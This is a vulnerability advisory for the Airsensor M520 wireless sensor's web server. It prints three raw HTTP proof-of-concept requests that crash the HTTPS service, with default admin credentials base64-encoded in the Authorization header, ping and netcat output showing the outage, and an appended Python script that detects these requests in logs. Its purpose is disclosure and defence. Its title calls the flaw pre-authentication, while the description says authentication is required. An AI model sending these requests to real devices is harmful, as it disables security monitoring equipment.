SYBSEC-ADV01: Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC

Title
Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC

ID
SYBSEC-ADV01

Severity
Medium - Remote DoS

History
15.AUG.2007 Vulnerability discovered
05.SEP.2007 Vendor contacted

Scope
Application Denial of Service

Platforms
Any

Author

URL
http://www.sybsecurity.com/advisors/SYBSEC-ADV01-Airsensor_M520_HTTPD_Remote_Preauth_Denial_Of_Service_and_Buffer_Overflow_PoC

Release
Public
Overview

AirDefense Enterprise is a wireless intrusion prevention system that monitors the airwaves 24x7 and provides the most advanced solution for rogue detection and mitigation, intrusion detection, policy monitoring and compliance, automated protection, forensic and incident analysis and remote troubleshooting.
Affected versions

The vulnerability has been reported in the following Airsensor versions:
Firmware version 4.3.1.1, Model = M520
Firmware version 4.4.1.4, Model = M520
Description

The vulnerability is caused by an unspecified error in the CGI input filter used to configure properties. It can be exploited by sending a specially crafted HTTPS request (authentication is required), which causes the HTTPS service on the system to crash.

Prerequisite: the "Use DHCP" option of the interface must be set to "No".
Workaround

Acknowledgments

References

Details

DoS exploit 1:

GET https://192.168.100.100/post.cgi?%41%41%41 HTTP/1.1
Host: 192.168.100.100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh
Authorization: Basic YWRtaW46YWlyc2Vuc29y

Screenshot:

DoS exploit 2:

GET https://192.168.100.100/ad.cgi?%41%41%41 HTTP/1.1
Host: 192.168.100.100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh
Authorization: Basic YWRtaW46YWlyc2Vuc29y

Screenshot:

DoS exploit 3:

GET https://192.168.100.100/adLog.cgi?%41%41%41 HTTP/1.1
Host: 192.168.100.100
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh
Authorization: Basic YWRtaW46YWlyc2Vuc29y

Screenshot:

Buffer Overflow LOG status

Screenshot:

Pinging:

> ping 192.168.100.100 -t
Pinging 192.168.100.100 with 32 bytes of data:

Before:
Reply from 192.168.100.100: bytes=32 time<1ms TTL=64
Reply from 192.168.100.100: bytes=32 time<1ms TTL=64
Reply from 192.168.100.100: bytes=32 time<1ms TTL=64

After:
Hardware error.
Hardware error.
Hardware error.
Request timed out.
Request timed out.
Request timed out.

> nc -vvn 192.168.100.100 443
(UNKNOWN) [192.168.100.100] 443 (?): connection refused ? Ooops!
sent 0, rcvd 0: NOTSOCK
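The three proof-of-concept requests above share one shape: an affected CGI handler called with a bare percent-encoded query string instead of the key=value pairs the legitimate refresh request (visible in the Referer header) uses. The following detection script is an added example, not part of this advisory or of any vendor tooling; it assumes a reverse proxy logging in Common Log Format in front of the sensor, and the log lines it scans are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# The three CGI handlers named in the advisory's proof-of-concept requests.
AFFECTED_CGI = ("/post.cgi", "/ad.cgi", "/adLog.cgi")

# Constructed sample, not from the advisory: Common Log Format as a reverse
# proxy in front of the sensor would write it (the sensor's own log format is
# not on the page, so this layout is an assumption). Line 1 is the legitimate
# refresh request seen in the advisory's Referer header; lines 2 and 3 mirror
# DoS exploits 1 and 2 (origin-form and absolute-form targets); line 4 hits a
# handler the advisory does not list and is therefore left unflagged.
SAMPLE_LOG = """\
192.168.100.1 - - [15/Aug/2007:10:00:01 +0200] "GET /adLog.cgi?submitButton=refresh&refresh=Refresh HTTP/1.1" 200 5120
192.168.100.1 - - [15/Aug/2007:10:00:07 +0200] "GET /post.cgi?%41%41%41 HTTP/1.1" 500 0
192.168.100.1 - - [15/Aug/2007:10:00:09 +0200] "GET https://192.168.100.100/ad.cgi?%41%41%41 HTTP/1.1" 500 0
192.168.100.1 - - [15/Aug/2007:10:00:12 +0200] "GET /index.cgi?%41%41%41 HTTP/1.1" 200 1024
"""

CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def is_malformed_query(query: str) -> bool:
    """True when the query string is not a set of key=value pairs. The
    legitimate request on the page is key=value&key=value; the crashing ones
    carry a bare percent-encoded string with no '=' in it at all."""
    return any("=" not in part for part in query.split("&") if part)


def scan_log(text: str) -> list:
    """Return one dict per request matching the advisory's trigger pattern:
    an affected CGI path whose query string is not in key=value form."""
    hits = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # unparsable line; skip rather than guess
        # urlsplit handles both "/x.cgi?q" and "https://host/x.cgi?q" targets.
        parts = urlsplit(m["target"])
        if parts.path in AFFECTED_CGI and is_malformed_query(parts.query):
            hits.append({"ts": m["ts"], "src": m["src"], "path": parts.path,
                         "decoded_query": unquote(parts.query),
                         "status": m["status"]})
    return hits
```

Because the advisory shows the HTTPS service refusing connections after the trigger, the sensor itself may log nothing for the crashing request; the last flagged entry before an outage, paired with a port 443 availability check, is the practical indicator.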

Exploit tool
